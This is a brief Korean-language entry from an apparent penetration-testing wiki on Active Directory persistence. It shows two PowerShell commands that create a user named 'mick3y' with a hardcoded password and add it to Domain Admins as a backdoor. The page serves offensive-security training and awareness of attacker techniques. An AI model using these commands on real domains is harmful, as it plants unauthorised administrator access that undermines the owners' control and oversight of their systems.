> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/persistence/active-directory/create-account.md).

# Create Account

공격자는 자신이 생성한 계정을 관리자로 등록함으로써 언제든 시스템을 제어할 수 있습니다.

## Abuse

<pre class="language-powershell"><code class="lang-powershell"><strong># 계정 생성
</strong>New-ADUser -Name 'mick3y' -SamAccountName 'mick3y' -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Enabled $true

<strong># 도메인 관리자에 등록
</strong>Add-ADGroupMember -Identity 'Domain Admins' -Members 'mick3y'
</code></pre>
